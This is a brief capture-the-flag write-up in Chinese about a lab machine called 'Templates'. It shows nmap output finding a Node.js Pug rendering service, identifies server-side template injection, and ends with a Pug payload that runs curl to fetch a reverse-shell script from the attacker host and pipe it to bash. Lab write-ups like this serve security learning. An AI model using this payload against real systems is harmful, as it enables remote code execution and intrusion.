Templates

端口扫描

root@ip-10-10-166-251:~/templates# nmap -sTCV -p- --min-rate 1000 10.10.38.72

Starting Nmap 7.60 ( https://nmap.org ) at 2023-10-04 06:01 BST
Nmap scan report for ip-10-10-38-72.eu-west-1.compute.internal (10.10.38.72)
Host is up (0.00032s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
5000/tcp open  http    Node.js (Express middleware)
|_http-title: PUG to HTML
MAC Address: 02:DB:0A:27:77:E5 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.41 seconds

5000

根据扫描结果我们可以看出这是一个 NODE,js 的 PUG 服务, 查看网页显示发现其是一个渲染的功能, 所以可能存在 SSTI 漏洞, 经过搜索我们可以发现下面的这个利用方式SSTI (Server Side Template Injection)

后渗透

利用上面的命令编写我们的命令执行语句

#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('curl 10.10.166.251:8000/rev.sh | bash')}()}